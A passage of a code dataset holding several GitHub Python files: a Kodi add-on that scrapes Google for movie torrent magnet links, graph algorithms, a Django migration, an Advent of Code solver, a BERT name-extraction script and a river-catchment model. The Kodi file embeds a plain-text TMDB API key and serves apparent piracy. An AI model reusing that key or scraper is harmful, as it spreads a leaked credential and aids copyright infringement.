mmm[-1]})\r\n\t\texcept:\r\n\t\t\tpass\r\n#-----------------------------------------\r\ndef BuscaFilmesPre():\r\n\tq = xbmcgui.Dialog().input(\"Se quiser colocar o ano faça dessa forma: Titanic, 1997\")\r\n\t#q = \"Mortal Kombat, 2021\"\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaFilmes&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t#q = \"Mortal Kombat\"\r\ndef BuscaFilmes():\r\n\tyearre = re.compile(\", (\\d{4})$\").findall(url)\r\n\tquery = quote_plus(re.sub(', (\\d{4})$', '', url))\r\n\tif yearre:\r\n\t\tyear=\"&year=\"+yearre[0]\r\n\telse:\r\n\t\tyear=\"\"\r\n\tST(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tentries=json.loads(link)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\ttrak = xx.traktM()\r\n\tfor entry in entries['results']:\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmm = mg.get_tmdb_details(tmdb_id=str(entry['id']), imdb_id=\"\", tvdb_id=\"\", title=\"\", year=\"\", media_type=\"movies\", preftype=\"\", manual_select=False, ignore_cache=False, lang=MUlangM)\r\n\t\t\tpc = 1 if str(mm[\"tmdb_id\"]) in trak else None\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(\"\", str(entry['id']), \"tmdb.Opcoes\", isFolder=False, IsPlayable=True, dados={'mmeta': mm, 'pc': pc})\r\n\t\texcept:\r\n\t\t\tpass\r\n\tprogress.close()\r\n\txx.AddDir(url+\" Dublado 1080p\", quote_plus(url+\" Dublado 1080p\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" x265\", quote_plus(url+\" x265\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" YTS\", quote_plus(url+\" YTS\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url, quote_plus(url), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n#-----------------------------------------\r\ndef BuscaCat():\r\n\ttry:\r\n\t\tgoogle = xx.OpenURL(\"https://www.google.com/search?q=\"+url+\"+torrent\")\r\n\t\tgooglere = re.compile(\";url=([^\\\"]+)\\&ved\\=\").findall(google)\r\n\t\tprogress = xbmcgui.DialogProgress()\r\n\t\tprogress.create('Carregando...')\r\n\t\tprogress.update(0, \"Carregando...\")\r\n\t\tprog = 1\r\n\t\t#ST(googlere)\r\n\t\tfor links in googlere[:5]:\r\n\t\t\tif (progress.iscanceled()): break\r\n\t\t\tmagnet = xx.OpenURL(links)\r\n\t\t\tmagnetre = re.compile('magnet\\:\\?[^\\'|\"]+').findall(magnet)\r\n\t\t\tfor link in magnetre:\r\n\t\t\t\ttitle = re.compile(\"dn=(.+?)(\\&|$)\").findall(link)\r\n\t\t\t\tif title:\r\n\t\t\t\t\tj = PeerSeed(link)\r\n\t\t\t\t\tif \"seeds\" in j:\r\n\t\t\t\t\t\txx.AddDir(str(j[\"seeds\"])+\" / \"+str(j[\"peers\"])+\" \"+unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\txx.AddDir(unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\tprogtotal = int(100*prog/5)\r\n\t\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\t\tprog+=1\r\n\t\tprogress.close()\r\n\texcept:\r\n\t\txx.AddDir(\"Erro no servidor\", \"\", \"\", iconimage, info=\"\", isFolder=False, IsPlayable=True)\r\n#----------------------------------------\r\ndef ST(x=\"\", o=\"w\"):\r\n\tif o == \"1\":\r\n\t\to = \"a+\"\r\n\tif type(x) == type({}) or type(x) == type([]):\r\n\t\ty = json.dumps(x, indent=4, ensure_ascii=True)\r\n\telse:\r\n\t\ty = str(str(x).encode(\"utf-8\"))\r\n\tPath = xbmc.translatePath( xbmcaddon.Addon().getAddonInfo('path') )\r\n\tpy = os.path.join( Path, \"study.txt\")\r\n\t#file = open(py, \"a+\")\r\n\tfile = open(py, o)\r\n\tfile.write(y+\"\\n\"+str(type(x)))\r\n\tfile.close()","repo_name":"D4anielCB/plugin.video.CubeTor","sub_path":"resources/lib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70093216807","text":"\"\"\"!\nPath in a given graph\n\"\"\"\n\nimport math\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\nfrom uuid import uuid4\n\nfrom pygmodels.gmodel.path import Path\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\nfrom pygmodels.gtype.abstractobj import AbstractTree\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.gtype.queue import PriorityQueue\n\n\nclass Tree(BaseGraph, AbstractTree):\n \"\"\"!\n Ordered Tree object\n \"\"\"\n\n def __init__(self, gid: str, data={}, edges: Set[Edge] = None):\n \"\"\"\"\"\"\n nodes = None\n if edges is not None:\n nodes = set()\n for e in edges:\n estart = e.start()\n eend = e.end()\n nodes.add(estart)\n nodes.add(eend)\n super().__init__(gid=gid, data=data, nodes=nodes, edges=edges)\n self.__root = None\n es = [e.type() for e in self.E]\n if es[0] == EdgeType.DIRECTED:\n\n def egen(x):\n return BaseGraphOps.outgoing_edges_of(self, x)\n\n else:\n\n def egen(x):\n return BaseGraphOps.edges_of(self, x)\n\n self.paths: Dict[\n str, Union[dict, set]\n ] = BaseGraphSearcher.breadth_first_search(\n self, n1=self.root, edge_generator=egen\n )\n self.topsort = self.paths.top_sort\n self.bfs_tree = self.paths.tree[self.root.id()]\n\n @classmethod\n def from_node_tuples(cls, ntpls: Set[Tuple[Node, Node, EdgeType]]):\n \"\"\"\"\"\"\n edges: Set[Edge] = set()\n\n for e in ntpls:\n child = e[0]\n parent = e[1]\n edge = Edge(\n edge_id=str(uuid4()),\n start_node=parent,\n end_node=child,\n edge_type=e[2],\n )\n edges.add(edge)\n return Tree(gid=str(uuid4()), edges=edges)\n\n @classmethod\n def from_edgeset(cls, eset: Set[Edge]):\n \"\"\"\"\"\"\n return Tree(gid=str(uuid4()), edges=eset)\n\n def node_table(self):\n \"\"\"\"\"\"\n node_table = {\n v.id(): {\"child\": False, \"parent\": False} for v in self.V\n }\n for e in self.E:\n estart_id = e.start().id()\n eend_id = e.end().id()\n node_table[estart_id][\"parent\"] = True\n node_table[eend_id][\"child\"] = True\n #\n return node_table\n\n def get_root(self):\n \"\"\"\"\"\"\n node_table = self.node_table()\n root_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is False and v[\"parent\"] is True\n ]\n V = {v.id(): v for v in self.V}\n return V[root_ids[0]]\n\n def leaves(self) -> Set[Node]:\n \"\"\"\"\"\"\n node_table = self.node_table()\n #\n leave_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is True and v[\"parent\"] is False\n ]\n return set([v for v in self.V if v.id() in leave_ids])\n\n @property\n def root(self) -> Node:\n \"\"\"\"\"\"\n if self.__root is None:\n self.__root = self.get_root()\n return self.__root\n\n def height_of(self, n: Node) -> int:\n \"\"\"!\"\"\"\n if not BaseGraphOps.is_in(self, n):\n raise ValueError(\"node not in tree\")\n nid = n.id()\n return self.topsort[nid]\n\n def _is_closure_of(\n self, x: Node, y: Node, fn: Callable[[int, int], bool]\n ) -> bool:\n \"\"\"\"\"\"\n xheight = self.height_of(x)\n yheight = self.height_of(y)\n f = fn(xheight, yheight)\n print(f)\n print(x)\n print(y)\n return f\n\n def is_upclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x upclosure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight >= xheight\n\n def is_downclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x down closure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight <= xheight\n\n def upset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_upclosure_of)\n\n def downset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_downclosure_of)\n\n def is_set_of(\n self, n: Node, fn: Callable[[Node, Node], bool]\n ) -> Set[Node]:\n nodes = BaseGraphOps.nodes(self)\n nset = set([y for y in nodes if fn(n, y) is True])\n return nset\n\n def less_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) <= self.height_of(second)\n\n def greater_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) >= self.height_of(second)\n\n def nodes_per_level(self, level: int) -> Set[Node]:\n \"\"\"!\n extract nodes of certain level in tree\n \"\"\"\n return set(\n [n for n in BaseGraphOps.nodes(self) if self.height_of(n) == level]\n )\n\n def extract_path(\n self,\n start: Node,\n end: Node,\n filter_fn: Callable[[Set[Edge], str], Set[Edge]] = lambda es, n: set(\n [e for e in es if e.start().id() == n]\n ),\n costfn: Callable[[Edge, float], float] = lambda x, y: y + 1.0,\n is_min=True,\n ):\n \"\"\"\"\"\"\n if (\n BaseGraphOps.is_in(self, start) is False\n or BaseGraphOps.is_in(self, end) is False\n ):\n raise ValueError(\"start or end node is not inside tree\")\n #\n upset = self.upset_of(start)\n if end not in upset:\n raise ValueError(\"end node is not in upset of start.\")\n downset = self.downset_of(end)\n upset_edges = set()\n for u in upset:\n for e in BaseGraphOps.outgoing_edges_of(self, u):\n upset_edges.add(e)\n downset_edges = set()\n for d in downset:\n for e in BaseGraphOps.outgoing_edges_of(self, d):\n downset_edges.add(e)\n problem_set = upset_edges.intersection(downset_edges)\n ucs_path = Path.from_ucs(\n g=self,\n goal=end,\n start=start,\n filter_fn=filter_fn,\n costfn=costfn,\n is_min=is_min,\n problem_set=problem_set,\n )\n return ucs_path\n\n @classmethod\n def find_mst_prim(\n cls, g: BaseGraph, edge_generator: Callable[[Node], Set[Node]]\n ) -> AbstractTree:\n \"\"\"!\n Find minimum spanning tree as per Prim's algorithm\n Even and Guy Even 2012, p. 32\n \"\"\"\n l_e = 1 # length of an edge\n l_vs = {}\n vs = []\n eps = {}\n\n for v in g.V:\n l_vs[v] = math.inf\n vs.append(v)\n #\n s = vs[0]\n l_vs[s] = 0\n eps[s] = set()\n TEMP = vs.copy()\n T: Set[Edge] = set()\n while TEMP:\n minv = None\n minl = math.inf\n for v in TEMP:\n if l_vs[v] < minl:\n minl = l_vs[v]\n minv = v\n TEMP = [v for v in TEMP if v != minv]\n if minv is None:\n raise ValueError(\n \"Min vertex is not found. Graph is probably not connected\"\n )\n T = T.union(eps[minv])\n for edge in edge_generator(g.V[minv]):\n unode = edge.get_other(g.V[minv])\n u = unode.id()\n if u in TEMP and l_vs[u] > l_e:\n l_vs[u] = l_e\n eps[u] = set([edge])\n return cls.from_edgeset(eset=T)\n\n @classmethod\n def find_mnmx_st(\n cls,\n g: BaseGraph,\n edge_generator: Callable[[Node], Set[Edge]],\n weight_function: Callable[[Edge], float] = lambda x: 1,\n is_min: bool = True,\n ) -> Tuple[AbstractTree, List[Edge]]:\n \"\"\"!\n a modified version of kruskal minimum spanning tree adapted for\n finding minimum and maximum weighted spanning tree of a graph\n\n from Even and Guy Even 2012, p. 42\n \"\"\"\n queue = PriorityQueue(is_min=is_min)\n T: Set[Edge] = set()\n clusters = {v.id(): set([v]) for v in g.V}\n L: List[Edge] = []\n for edge in g.E:\n queue.insert(weight_function(edge), edge)\n #\n while len(queue) > 0:\n edge = None\n if is_min is True:\n k, edge = queue.min()\n else:\n k, edge = queue.max()\n #\n u = edge.start().id()\n v = edge.end().id()\n vset = clusters[v]\n uset = clusters[u]\n if vset != uset:\n T.add(edge)\n L.append(edge)\n clusters[v] = vset.union(uset)\n clusters[u] = vset.union(uset)\n return cls.from_edgeset(eset=T), L\n\n #\n def assign_num(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n counter: int,\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n counter += 1\n num[v] = counter\n visited[v] = True\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n cond = visited.get(u)\n if cond is None or cond is False:\n parent[u] = v\n self.assign_num(\n u,\n num=num,\n generative_fn=generative_fn,\n visited=visited,\n parent=parent,\n counter=counter,\n )\n\n #\n def check_ap(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n low: Dict[str, int],\n counter: int,\n aset: Set[str],\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n low[v] = num[v]\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n if num[u] >= num[v]:\n self.check_ap(\n v=u,\n num=num,\n visited=visited,\n parent=parent,\n low=low,\n counter=counter,\n generative_fn=generative_fn,\n aset=aset,\n )\n if low[u] >= num[v]:\n aset.add(v)\n #\n low[v] = min(low[v], low[u])\n elif parent[v] != u:\n low[v] = min(low[v], num[u])\n\n def find_separating_vertices(\n self, generative_fn: Callable[[Node], Set[Node]]\n ) -> Set[Node]:\n \"\"\"!\n find separating vertices of graph\n as in Erciyes 2018, p. 230, algorithm 8.3\n \"\"\"\n num: Dict[str, float] = {n: math.inf for n in self.V}\n low: Dict[str, float] = {n: math.inf for n in self.V}\n visited: Dict[str, bool] = {}\n parent: Dict[str, str] = {n: \"\" for n in self.V}\n aset: Set[str] = set()\n\n counter = 1\n v = [node for node in self.V][0]\n self.assign_num(\n v=v,\n num=num,\n visited=visited,\n parent=parent,\n counter=counter,\n generative_fn=generative_fn,\n )\n self.check_ap(\n v=v,\n num=num,\n visited=visited,\n generative_fn=generative_fn,\n parent=parent,\n low=low,\n counter=counter,\n aset=aset,\n )\n return set([self.V[a] for a in aset])\n","repo_name":"D-K-E/graphical-models","sub_path":"pygmodels/gmodel/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"34716471510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport oilserver.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oilserver', '0010_auto_20160404_2138'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='testcase',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcase.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testcaseclass',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcaseclass.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testframework',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this test framework and version.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n ]\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/migrations/0011_auto_20160404_2139.py","file_name":"0011_auto_20160404_2139.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21751456946","text":"from . import computer\n\n\ndef part1():\n \"\"\"\n The software draws tiles to the screen with output instructions:\n every three output instructions specify the x position (distance from the left), y position (distance from the top), and tile id.\n\n 0 is an empty tile. No game object appears in this tile.\n 1 is a wall tile. Walls are indestructible barriers.\n 2 is a block tile. Blocks can be broken by the ball.\n 3 is a horizontal paddle tile. The paddle is indestructible.\n 4 is a ball tile. The ball moves diagonally and bounces off objects.\n\n How many block tiles are on the screen when the game exits?\n \"\"\"\n program = read_input()\n output_values = []\n computer.run_program(program, [], output_values)\n blocks = output_values[2::3].count(2)\n print(blocks)\n\n\ndef part2():\n \"\"\"\n Memory address 0 represents the number of quarters that have been inserted; set it to 2 to play for free.\n The arcade cabinet has a joystick that can move left and right.\n If the joystick is in the neutral position, provide 0.\n If the joystick is tilted to the left, provide -1.\n If the joystick is tilted to the right, provide 1.\n When three output instructions specify X=-1, Y=0, the third output instruction is the new score.\n What is your score after the last block is broken?\n \"\"\"\n program = read_input()\n program[0] = 2\n input_values = []\n arcade = computer.get_computer(program, input_values)\n score = 0\n ball_x = 0\n paddle_x = 0\n while True:\n x = next(arcade)\n if type(x) == list: # When the game is finished and the program halts, the computer outputs the program state\n break\n y = next(arcade)\n v = next(arcade)\n if v == 3:\n paddle_x = x\n elif v == 4: # Every tick, the last value to be updated is that of the ball\n ball_x = x\n next_input = 0\n if ball_x < paddle_x:\n next_input = -1\n elif ball_x > paddle_x:\n next_input = 1\n input_values.append(next_input)\n if x == -1:\n score = v\n print(score)\n\n\ndef read_input():\n with open('input/day13.txt') as input_file:\n return [int(x) for x in input_file.readline().split(',')]\n","repo_name":"Metamess/AdventOfCode","sub_path":"2019/days/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3221607259","text":"from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n'''\nCitação de projeto utilizado: https://github.com/neuralmind-ai/portuguese-bert\n@InProceedings{souza2020bertimbau,\n author=\"Souza, F{\\'a}bio and Nogueira, Rodrigo and Lotufo, Roberto\",\n editor=\"Cerri, Ricardo and Prati, Ronaldo C.\",\n title=\"BERTimbau: Pretrained BERT Models for Brazilian Portuguese\",\n booktitle=\"Intelligent Systems\",\n year=\"2020\",\n publisher=\"Springer International Publishing\",\n address=\"Cham\",\n pages=\"403--417\",\n isbn=\"978-3-030-61377-8\"\n}\n'''\n\nfrom transformers import BertForTokenClassification, DistilBertTokenizerFast, pipeline\n\nmodel = BertForTokenClassification.from_pretrained('pierreguillou/ner-bert-large-cased-pt-lenerbr')\ntokenizer = DistilBertTokenizerFast.from_pretrained('pierreguillou/bert-large-cased-pt-lenerbr'\n , model_max_length=512\n , do_lower_case=False\n )\nnlp = pipeline('ner', model=model, tokenizer=tokenizer, grouped_entities=True)\n\ndef find_people(id:str, text:str) -> list:\n\n result = nlp(str(text).replace('- ', ''))\n names = []\n lastIndex = 0\n\n for item in result:\n if item['entity_group'] == \"PESSOA\":\n if \"#\" in item['word'] and names != []:\n name = names[lastIndex]['content']\n name += item['word']\n names[lastIndex]['content'] = name.replace(\"#\", '')\n names[lastIndex]['end_offset'] = item['end']\n else:\n names.append({\n 'excerpt_id': id,\n 'content': item['word'],\n 'start_offset': item['start'],\n 'end_offset': 0,\n 'entity_type': 'PERSON'\n })\n lastIndex = len(names) - 1\n \n #if names != []:\n #print(names)\n return names\n\n### FOR TESTS PURPOSE ONLY ###\n\ndef execute_csv(file):\n \n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n names = find_people(row['excerpt_id'], row['excerpt'])\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], uf=row['source_state_code'], cidade=row['source_territory_name'], tema=row['excerpt_subthemes'], data=row['source_created_at'])\n db_gen = get_db()\n db = next(db_gen)\n count_excerpt+=1 if (create_excerpt_metadata(db, excerpt_metadata)) else False\n if len(names) > 0:\n for name in names:\n item = NamedEntityCreate(excerpt_id=name['excerpt_id'], content=name['content'], start_offset=name['start_offset'], end_offset=name['end_offset'], entity_type=name['entity_type'])\n\n count_named_entities+=1 if (create_named_entity(db, item)) else False\n\n return \"Saved \" + str(count_excerpt) + \" excerpt ids and \" + str(count_named_entities) + \" named entitites\"","repo_name":"MLRG-CEFET-RJ/qdrec","sub_path":"scripts/bert_ner_processor.py","file_name":"bert_ner_processor.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"11817378517","text":"# -*- coding: utf-8 -*-\nimport os, io, re, subprocess, copy, graphviz as gv, pandas as pd, matplotlib.pyplot as plt, numpy as np\nfrom scipy.interpolate import griddata\nfrom matplotlib.cm import ScalarMappable\nfrom matplotlib.colors import Normalize\n\nos.environ['PATH']=os.environ['PATH']+\";C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\"\n\nclass Catchment(object):\n \"\"\"\n Class for catchment implemented as a linked list\n \"\"\"\n def __init__(self):\n self.reaches = {}\n self.canStart = {}\n self.canBeCleaned = {}\n self.failed = {}\n self.nReachDone = 0\n self.ouletReaches = []\n self.inletReaches = []\n \n def addReach(self,ID, reachData, hydrologyMassLoadingsFileBase):\n \"\"\"\n Adds a reach to the catchment. \n \"\"\"\n self.reaches[ID] = Reach(ID, reachData, hydrologyMassLoadingsFileBase, self.signalStatusChange)\n\n def finalize(self):\n \"\"\"\n Finalize the catchment after all reaches have been added.\n Sets the links between the reaches.\n \"\"\"\n self.nReach = len(self.reaches)\n\n # The Directed Acyclic Graph specifying the watershed topology\n # A dict with for each reach a tuple with the downstream reaches\n self.directedGraph = {}\n\n for reach in self: # for every reach...\n for dId in list(reach.downstreamRef): # loop through downstream reaches\n if not dId in self.reaches.keys():\n # remove downstream reach if it is not in the catchment (e.g. if catchment is cropped)\n del(reach.downstreamRef[dId])\n reach.downstreamIDs.remove(dId)\n else:\n downstreamReach = self.reaches[dId]\n reach.set_downstreamRef(downstreamReach) # set reference to downstream reaches for this reach\n downstreamReach.set_upstreamRef(reach) # set upstream refence to this reach for downstream reaches\n downstreamReach.upstreamIDs.append(reach.ID)\n self.directedGraph[reach.ID] = (dId,)\n \n for reach in self:\n # determine the inlet and outlet reaches\n if len(reach.downstreamIDs)==0:\n self.ouletReaches.append(reach)\n if len(reach.upstreamIDs)==0:\n self.inletReaches.append(reach)\n\n # set the current status of the reaches and whether or not they have loading from upstream\n # checkstatus() and set_hasUpstreamLoading() propagate downward in the catchment so looping\n # over inlet reaches is sufficient\n for reach in self.inletReaches:\n reach.checkStatus()\n reach.set_hasUpstreamLoading()\n \n for reach in self:\n # set flag indicating whether mass outflow (MFU) file is Needed\n reach.set_massOutflowFileNeeded()\n\n \n def __iter__(self):\n \"\"\"\n Returns iterator over reaches\n \"\"\"\n return(iter(self.reaches.values()))\n\n @property\n def reachIDs(self):\n \"\"\"\n Returns list of reach IDs\n \"\"\"\n return(list(self.reaches.keys()))\n\n def __getitem__(self,ID):\n \"\"\"\n Returns reach for specified ID. ID may be a dict key, a index, or a slice\n \"\"\"\n if isinstance(ID, int):\n return(list(self.reaches.values())[ID])\n elif isinstance(ID,slice):\n return(list(self.reaches.values())[ID])\n else:\n return(self.reaches[ID])\n\n def __getattr__(self,name):\n \"\"\"\n Returns a dict for all reaches with reachIDs as keys and attribute \n name as values. If an attribute accessed that is not a member of Catchment, this\n function is called. This allows reach attribute prop to be accessed as\n catchment.prop, provided that prop is not an attribute of catchement.\n \"\"\"\n return({reach.ID: getattr(reach,name) for reach in self})\n\n def signalStatusChange(self,reach):\n \"\"\"\n Called by reaches to inform the catchment object of a status change.\n This is used to maintain a list of reaches that can start.\n \"\"\"\n if reach.stat == Reach.flagCanStart:\n self.canStart[reach.ID] = reach\n elif reach.stat == Reach.flagRunning:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n elif reach.stat == Reach.flagCanBeCleaned:\n self.canBeCleaned[reach.ID] = reach\n elif reach.stat == Reach.flagCleaning:\n del self.canBeCleaned[reach.ID]\n elif reach.stat == Reach.flagDone:\n self.nReachDone += 1\n elif reach.stat in [Reach.flagError, Reach.flagUpstreamError]:\n if reach.ID in self.canStart: del self.canStart[reach.ID]\n self.failed[reach.ID] = reach\n\n @property\n def canStartReaches(self):\n return([reach for reach in self.canStart.values()])\n\n @property\n def canBeCleanedReaches(self):\n return([reach for reach in self.canBeCleaned.values()])\n\n @property\n def failedList(self):\n return self.failed\n\n def getReachProp(self, prop, reachIds = None):\n \"\"\"\n Returns reach property for all, or a selection of reaches\n \"\"\"\n return([reach.getProperty(prop) for reach in self])\n\n @property\n def isDone(self):\n return self.nReachDone==len(self.reaches)\n\n def catchmentMap(self, colorVals = None, valRange = [0,1], fileName = None, title = None, linewidth = 5):\n withnames = False\n #create figure object and color map\n fig = plt.figure(figsize=(12,12))\n ax = fig.add_subplot(111)#, projection=\"3d\")\n ax.set_xlabel(\"X [m]\")\n ax.set_ylabel(\"Y [m]\")\n ax.grid(True)\n \n if type(colorVals) == list:\n cmap = ScalarMappable(cmap='jet',norm = Normalize(valRange[0],valRange[1]))\n cmap.set_array(valRange)\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n cmap = None\n colorVals = [colorVals]*len(self.reaches)\n colorFcn = lambda x: colorVals[0]\n \n # plot reaches\n for index, reach in enumerate(self): \n for downstream_reach in reach.downstreamRefs:\n ax.plot([reach.x,downstream_reach.x],[reach.y,downstream_reach.y],color=colorFcn(colorVals[index]), linewidth = linewidth) \n if withnames:\n x_coord = (reach.x+downstream_reach.x)/2. \n y_coord = (reach.y+downstream_reach.y)/2. \n ax.text(x_coord,y_coord,reach.key, verticalalignment='bottom', horizontalalignment='right',\n color=fontcolor, fontsize=fontsize, \n bbox=dict(facecolor=color_waterbody, edgecolor='None', boxstyle='round,pad=.2',alpha=.5))\n \n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n if not cmap is None: \n cbar = plt.colorbar(cmap, ax = ax)\n cbar.ax.tick_params(labelsize=15) \n if not title is None: plt.title(title,fontsize=18)\n if not fileName is None:\n plt.savefig(os.path.join(fileName))\n plt.close()\n\n \n def catchmentGraph(self, colorVals = None, colorMap = 'jet', range = [0,1], format = 'pdf', fileName = 'graph'):\n # Makes a graph of the reaches and their connections with graphviz.\n dot = gv.Digraph(engine= 'dot')\n dot.attr('graph', nodesep='1',ranksep = '0.005', margin = '0')\n dot.attr('node', margin = '0',fixedsize = 'false', fontsize = '6',width = '0.1',\n height = '0.05', shape = 'box', style = 'filled', penwidth = '0.0')\n dot.attr('edge', arrowsize = '0.2', penwidth = '0.25')\n\n if not colorVals is None:\n cmap = ScalarMappable(cmap=colorMap,norm = Normalize(range[0],range[1]))\n colorFcn = lambda x: '#%02x%02x%02x' % cmap.to_rgba(x,bytes=True)[0:3]\n else:\n colorFcn = lambda x: None\n colorVals = [0]*self.nReach\n \n for idx, reach in enumerate(self):\n dot.node(reach.ID,label = reach.ID, fillcolor = colorFcn(colorVals[idx])) # add node/reach\n if len(reach.downstreamRef)>0: # add connections to down stream\n dot.edge(reach.ID, list(reach.downstreamRefs)[0].ID, weight = '10')\n try:\n dot.render(filename=fileName, format = format, renderer=None, formatter=None)\n except:\n pass\n\nclass Reach(object):\n \"\"\"\n Class for reach.\n \"\"\"\n\n # Status flags\n flagWaiting = 0\n flagCanStart = 1\n flagRunning = 2\n flagRunDone = 3\n flagCanBeCleaned = 4\n flagCleaning = 5\n flagDone = 6\n flagError = 7\n flagUpstreamError = 8\n\n def __init__(self, ID, reachData, hydrologyMassLoadingsFileBase, signalStatusChange):\n \"\"\"\n Creats a reach object.\n \"\"\"\n if not type(reachData.RchIDDwn) is list: reachData.RchIDDwn = [reachData.RchIDDwn]\n self.ID = ID\n self.hydrologyMassLoadingsFile = ID + hydrologyMassLoadingsFileBase\n self.length = reachData.Len\n self.downstreamIDs = reachData.RchIDDwn\n self.upstreamIDs = []\n self.downstreamRef = {ID:None for ID in reachData.RchIDDwn}\n self.upstreamRef = {}\n self.width = reachData.WidWatSys\n self.slope = reachData.SloSidWatSys\n self.suspSolids = reachData.ConSus\n self.omSuspSolids = reachData.CntOmSusSol\n self.bulkDens = reachData.Rho\n self.porosity = reachData.ThetaSat\n self.omSediment = reachData.CntOM\n self.nSegments = 1\n self.signalStatusChange = signalStatusChange\n self.stat = Reach.flagWaiting\n self.hasDrift = 